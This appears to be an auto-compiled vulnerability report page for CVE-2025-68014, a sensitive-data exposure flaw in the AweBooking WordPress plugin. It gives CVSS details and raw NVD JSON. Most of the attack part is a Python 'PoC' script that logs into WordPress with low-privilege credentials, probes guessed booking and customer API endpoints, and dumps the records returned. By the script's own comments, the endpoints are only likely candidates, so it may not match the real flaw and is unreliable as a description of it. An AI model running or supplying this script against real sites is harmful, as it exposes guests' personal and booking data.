Security Vulnerability Report
中文
CVE-2025-68014 CVSS 6.5 MEDIUM

CVE-2025-68014

Published: 2026-01-05 11:17:41
Last Modified: 2026-04-23 15:35:50

Description

Insertion of Sensitive Information Into Sent Data vulnerability in awethemes AweBooking awebooking allows Retrieve Embedded Sensitive Data.This issue affects AweBooking: from n/a through <= 3.2.26.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

AweBooking <= 3.2.26 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68014 AweBooking Sensitive Data Exposure PoC # Affected Version: <= 3.2.26 # CVSS: 6.5 (Medium) import requests import json import sys def exploit_awebooking_sensitive_data(base_url, username, password): """ Exploit for CVE-2025-68014: AweBooking Sensitive Data Exposure This PoC demonstrates how a low-privilege user can retrieve sensitive data. """ session = requests.Session() # Step 1: Authentication login_url = f"{base_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print("[*] Attempting to authenticate...") response = session.post(login_url, data=login_data, allow_redirects=False) if 'wordpress_logged_in' not in str(session.cookies): print("[-] Authentication failed!") return False print("[+] Authentication successful!") # Step 2: Identify vulnerable API endpoint # Common AweBooking endpoints that may expose data vulnerable_endpoints = [ '/wp-json/awebooking/v1/bookings', '/wp-json/awebooking/v1/customers', '/wp-json/awebooking/v1/reservations', '/?rest_route=/awebooking/v1/bookings', '/?rest_route=/awebooking/v1/customers', '/wp-admin/admin-ajax.php?action=awebooking_get_bookings', '/wp-admin/admin-ajax.php?action=awebooking_get_customers' ] print("[*] Enumerating vulnerable endpoints...") for endpoint in vulnerable_endpoints: url = base_url + endpoint try: response = session.get(url, timeout=10) if response.status_code == 200: print(f"[+] Endpoint accessible: {endpoint}") print(f"[+] Response preview: {response.text[:500]}") # Try to parse JSON response try: data = response.json() print(f"[+] JSON data retrieved: {json.dumps(data, indent=2)[:1000]}") except: print(f"[*] Response is not JSON, showing raw text...") print(response.text[:500]) except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") # Step 3: Try to extract specific sensitive data print("[*] Attempting to extract sensitive information...") # Try to get booking list with all fields booking_url = base_url + "/wp-json/awebooking/v1/bookings?per_page=100" response = session.get(booking_url) if response.status_code == 200: try: bookings = response.json() print(f"[+] Retrieved {len(bookings)} booking records") for booking in bookings[:5]: # Show first 5 print(json.dumps(booking, indent=2)) except: pass return True if __name__ == "__main__": if len(sys.argv) < 5: print("Usage: python cve-2025-68014.py <target_url> <username> <password>") print("Example: python cve-2025-68014.py http://example.com admin password123") sys.exit(1) base_url = sys.argv[1].rstrip('/') username = sys.argv[2] password = sys.argv[3] exploit_awebooking_sensitive_data(base_url, username, password)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68014", "sourceIdentifier": "[email protected]", "published": "2026-01-05T11:17:41.387", "lastModified": "2026-04-23T15:35:50.120", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in awethemes AweBooking awebooking allows Retrieve Embedded Sensitive Data.This issue affects AweBooking: from n/a through <= 3.2.26."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/awebooking/vulnerability/wordpress-awebooking-plugin-3-2-26-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}